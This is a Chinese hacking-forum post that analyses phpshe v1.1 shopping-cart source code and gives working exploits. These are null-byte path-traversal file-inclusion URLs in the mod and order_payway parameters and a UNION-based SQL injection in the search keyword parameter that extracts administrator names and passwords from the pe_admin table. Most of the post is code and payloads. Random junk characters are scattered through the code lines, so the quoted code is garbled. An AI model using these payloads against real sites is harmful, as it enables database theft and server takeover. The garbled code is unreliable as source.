找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 phpshe v1.1多处SQL注入和文件包含漏洞Getshell
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1961|回复: 0
打印 上一主题 下一主题

phpshe v1.1多处SQL注入和文件包含漏洞Getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-4-16 16:45:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/*******************************************************/
4 z, ~2 j0 w) h3 i; [9 N/* Phpshe v1.1 Vulnerability; f1 c0 h- d, u, N- L5 L5 F3 p
/* ========================
  l8 L  ^8 C5 f1 e/* By: : Kn1f3
2 F. g5 E9 _' a# w" J/* E-Mail : 681796@qq.com7 y6 w- b' \9 S" N" N
/*******************************************************/; u/ w7 L# o, {1 Q2 H' o9 o
0×00 整体大概参数传输
& J6 ^4 H5 v1 D- n. y' i
3 _8 v" o$ q( w# W: q3 x: z8 W/ |5 s& K& @- T

( ]8 N3 c6 ]; c' J! F$ R//common.php+ e/ A6 t! J! [4 s: u2 H% q
if (get_magic_quotes_gpc()) {! |/ p- [; O6 Y
!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
, V, N& A. K  ]!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');3 a. Z3 L- }9 z9 Q
}/ O$ h' f3 h/ l1 M/ f
else {
7 D, u2 m) w: g!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
( o0 x5 f$ k( x: g$ J( i( @!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');
) S, Y7 [: E8 ]& ~}* Y3 u4 z& q& W. R/ S; h4 m
session_start();! @* X0 x' A# f* d$ N0 d
!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');! o! T# e- X9 q& i& f. o
!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');
9 [9 x- @, L( m: y" y; Z# f. |4 o6 o+ t* q4 x( a" c& A
0×01 包含漏洞
* T3 @5 e+ N% o& ]6 |6 l& J
- g  `9 t3 n- c4 m7 G9 J' c& x5 }+ p, r* x7 E
//首页文件4 Q7 j5 d' [9 q3 b, g
<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);$ R$ h2 ?/ @" {( L  Q0 W7 u
include("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞! ]8 c$ C* ^0 [4 _5 t: \. ^% E
pe_result();6 k: z1 {1 {! t+ h3 Y7 t- h  ^
?>
8 e2 k5 U3 w% v  h0 V//common 文件 第15行开始
; p) `# x' ]* f9 Purl路由配置
4 k; U9 O0 @! t7 y2 ^  [3 t$module = $mod = $act = 'index';; L% e0 [0 H6 S! X1 R: P$ I
$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
8 s) }& }# \0 y$ L' u5 F$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);
6 \- _. v2 q- n- t' Z$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);
( k+ D8 N6 ?: ~1 Q% A* r( E& x0 z' P//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00
# }  Z6 Q6 @2 A5 Y4 s& u


+ s7 N- y# w' _% a) U 7 U9 X. w6 e# ^8 t/ u* }# z% M  J
0×02 搜索注入
! j% n0 i$ K" c! }) U1 ^
  B+ A3 u- U# s<code id="code2">

//product.php文件; [* @; y& b4 z/ B
case 'list':
! y- L+ @# f2 P+ c4 O2 `$category_id = intval($id);
3 T5 X3 e, H+ n4 }$info = $db->pe_select('category', array('category_id'=>$category_id));
" W( L6 y2 V  U) R6 g" ~//搜索
4 b1 B+ L2 I9 y' D3 d6 m, s. b  ], Q  P$sqlwhere = " and `product_state` = 1";
: C) s. Y# v5 kpe_lead('hook/category.hook.php');
) w+ d- ], o* ^& s: F$ M4 Vif ($category_id) {8 y9 d* h# X% x( r: m7 @
where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
' C9 e* z4 S1 Z, l$ [( l8 s& v5 Q) L+ x}8 X+ W' g* B0 O$ n! o
$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤6 E; s( X  x# N9 v% G$ [
if ($_g_orderby) {
% X. X5 e' m( I0 c) D$orderby = explode('_', $_g_orderby);. S* R7 E  V& |" j! K1 q
$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";2 m' ~$ b$ K3 ]2 G; r; N8 c
}
8 Y7 N4 L' J( W9 E, v' Jelse {% M8 K9 s2 a) A8 F. D- ^! B' ^/ T
$sqlwhere .= " order by `product_id` desc";' A6 E. F; H  v, @8 k6 e
}4 A- Z. H  `- `7 H3 O) H, u
$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));( U( i0 _7 Z6 O7 c  h
//热卖排行
  `' s' D* T& Q- @2 u$product_hotlist = product_hotlist();
3 a* z1 G5 K; a//当前路径8 @( C* F' G$ a( r7 D! L
$nowpath = category_path($category_id);
+ D; L5 A* \# V: {) [$seo = pe_seo($info['category_name']);
  W9 |* u9 ?$ P# Kinclude(pe_tpl('product_list.html'));
4 N) B9 u$ e& c. E' A  E//跟进selectall函数库
6 m1 {1 l' S* `. ^! M. V& ~public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())5 L0 A  G* ]" E# L
{5 p# S* X/ W, t" q' O- K' C5 m
//处理条件语句- p' {. e* Y; [8 |* f7 o- M
$sqlwhere = $this->_dowhere($where);- f4 }( t6 d& E) f$ y! l, N
return $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);
/ Q8 D$ V7 Q/ n/ V9 r4 g" D}! C6 X  N; e% \  f; h
//exp+ ~/ S9 _( Y& k+ g" T# {/ F1 Z
product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1
( j% T1 W, b% M" p4 U8 ^

</code>; h% D* j, D0 V% v4 i" `
, Y5 C; W) i" a9 q& b
0×03 包含漏洞2
! n- J, i+ H' P, g: ?1 O, B
0 n7 Z: F% w; @<code id="code3">

//order.php

case 'pay':


# l* V% e# e9 @( X# E/ t; n# Y9 g$order_id = pe_dbhold($_g_id);

; M5 C( U$ S$ r$ T7 e3 A9 Z
$cache_payway = cache::get('payway');


: X+ h0 m2 W9 _5 F1 M: [foreach($cache_payway as $k => $v) {

: g( W& b, n% r4 @' R
$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);

4 M- k/ n. A0 h7 P$ x
if ($k == 'bank') {

) o. g. M- c0 v* ~, ^
$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);


- {5 K9 p, j, t2 c6 |# [}


# p3 O' m/ E2 N" o  w}


" ^- M4 f( u* N* l& V- [$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));

% }! k2 ]0 s. c. c
!$order['order_id'] && pe_error('订单号错误...');


% D4 |+ S- W/ I) ~  i6 ]if (isset($_p_pesubmit)) {

; M8 r$ i( h% j9 `. n3 M
if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {


8 v, R  A9 T8 z- J) t; V2 o$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));


( n1 h# l8 V8 _$ \% d( u; ?foreach ($info_list as $v) {

( W7 ^/ u. z5 M* Q
$order['order_name'] .= "{$v['product_name']};";
! ^: x& f, _0 o# u7 N- R


2 @8 w( F. D2 n, f) _& ~/ |}


$ x0 m4 X( H- F' z1 u4 Jecho '正在为您连接支付网站,请稍后...';

& }0 N' g/ |2 X/ J
include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");


$ g7 `9 Y' I$ e5 _2 x- c}//当一切准备好的时候就可以进行"鸡肋包含了"

4 T- P7 O' g$ j% N
else {

3 a1 x+ Q$ G. y/ ]1 K
pe_error('支付错误...');


/ u' Y0 g. }! q5 I}

7 ^# Y: s! B" H
}

1 Q% Y7 r* x, F# q/ v5 e
$seo = pe_seo('选择支付方式');

) o5 J/ t* Z+ r% |+ \, y$ k
include(pe_tpl('order_pay.html'));


: r8 _: q0 O0 }1 e' Nbreak;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>
* P! U& x/ |. q6 ?http://www.myhack58.com/Article/UploadPic/2013-4/20134161293183866.jpg

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表